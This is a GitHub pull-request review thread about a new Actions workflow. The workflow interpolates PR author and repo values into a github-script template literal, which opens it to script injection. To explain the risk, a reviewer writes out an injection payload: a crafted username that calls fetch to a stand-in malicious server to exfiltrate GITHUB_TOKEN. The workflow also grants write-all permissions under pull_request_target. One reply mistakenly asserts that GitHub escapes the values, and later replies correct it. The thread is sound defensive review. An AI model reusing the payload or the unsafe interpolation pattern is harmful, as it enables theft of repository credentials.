.github/workflows/developer_onboarding_notification.yml

```diff
@@ -0,0 +1,64 @@
+
+name: PR Merge Comment
+
+on:
+  pull_request_target:
+    types: [closed]
+
+permissions: write-all
+
+jobs:
+  comment-on-merge:
+    if: github.event.pull_request.merged == true && github.event.pull_request.base.ref == 'develop'
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout repository
+        uses: actions/checkout@v4
+
+      - uses: ./.github/actions/merge
+      - name: Count merged PRs
+        uses: actions/github-script@v6
+        with:
+          github-token: ${{ secrets.GITHUB_TOKEN }}
+          script: |
+            const author = context.payload.pull_request.user.login;
+            const repo = context.repo.repo;
+            const owner = context.repo.owner;
+            
+            const { data } = await github.rest.search.issuesAndPullRequests({
+              q: `repo:${owner}/${repo} type:pr state:closed author:${author}`
```

Comment:
I'm not familiar with how this github-script action works, so could you do some research and check that it properly escapes the `${...}` arguments? Normally JS handles the escaping correctly, but since this code is getting passed to the action as a string, that escaping might not apply anymore.

Alternatively, or if it doesn't escape correctly, we need to sanitize the inputs to prevent code injection.

As an example, a simple code injection attack (**please don't try this!**) might look like someone setting their username to:

```
myUsername`}); await fetch(`https://my-malicious-server.com/exfiltrate?token=${process.env.GITHUB_TOKEN}`); const discard = ({a: `
```

Then if escaping is done incorrectly, the script would look like this:

```js
...
const { data } = await github.rest.search.issuesAndPullRequests({
  q: `repo:owner/repo type:pr state:closed author:myUsername`}); await fetch(`https://example.com/exfiltrate?token=${process.env.GITHUB_TOKEN}`); const discard = ({a: ``
});
...
```

Reply:
## How GitHub Actions Handles Escaping
When you pass a script as a string in GitHub Actions, the action's implementation ensures that the string is interpreted correctly, including the proper evaluation of template literals. This means that the ${...} placeholders will be correctly handled by JavaScript, even when passed as part of a string to the action.

Reply:
Concern Regarding Code injection is already solved by github username policy,
![image](https://github.com/user-attachments/assets/a9449063-42dc-4934-a81b-d2051959695d)

Reply:
> When you pass a script as a string in GitHub Actions, the action's implementation ensures that the string is interpreted correctly, including the proper evaluation of template literals. This means that the ${...} placeholders will be correctly handled by JavaScript, even when passed as part of a string to the action.

Can you point to a reference for this so future developers can find the original source? I would hope GitHub handles this properly, but it's good to make sure and document the info.

> Concern Regarding Code injection is already solved by github username policy,

The example I gave using the username was just one example. There are at least 2 other ways to carry out a similar attack on your code that you should be able to see. Please make sure you fully understand this attack (it's an important one for all developers to consider) and the other two ways to carry it out here.

More broadly, since validation here is so easy, I'd recommend doing the validation ourselves anyway (assuming the escaping isn't handled correctly; if the escaping is correct, then there's no need to validate). This is because GitHub has told us that we're getting the author, repo, and owner, but we haven't actually confirmed that this is true. If there were a bug in GitHub that let someone manipulate `context.repo.repo`, validation would prevent this relatively insignificant bug from turning into a code injection vulnerability.

Side note: as a general practice, inputs should always be validated. Keeping track of which inputs have undergone how much validation is a pain, so it's usually better to just validate inputs as soon as they are accepted by the program and make sure they are exactly in the form we expect them to be in. This is why our controllers validate all arguments they receive, regardless of whether they get used in any security-critical situations. This script is so short I think it's okay to skip the validation so long as the escaping is handled though.

Reply:
The [example GitHub gives in their hardening guide](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#example-of-a-script-injection-attack) is similar to your code, so it looks like escaping isn't handled automatically. To eliminate the vulnerability, I recommend their [suggestion of using an intermediate environment variable](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable). It sounds like that's a best practice anyway, and from a security perspective, writing code in a way where injection is just impossible is more robust than validating inputs

Reply:
Done!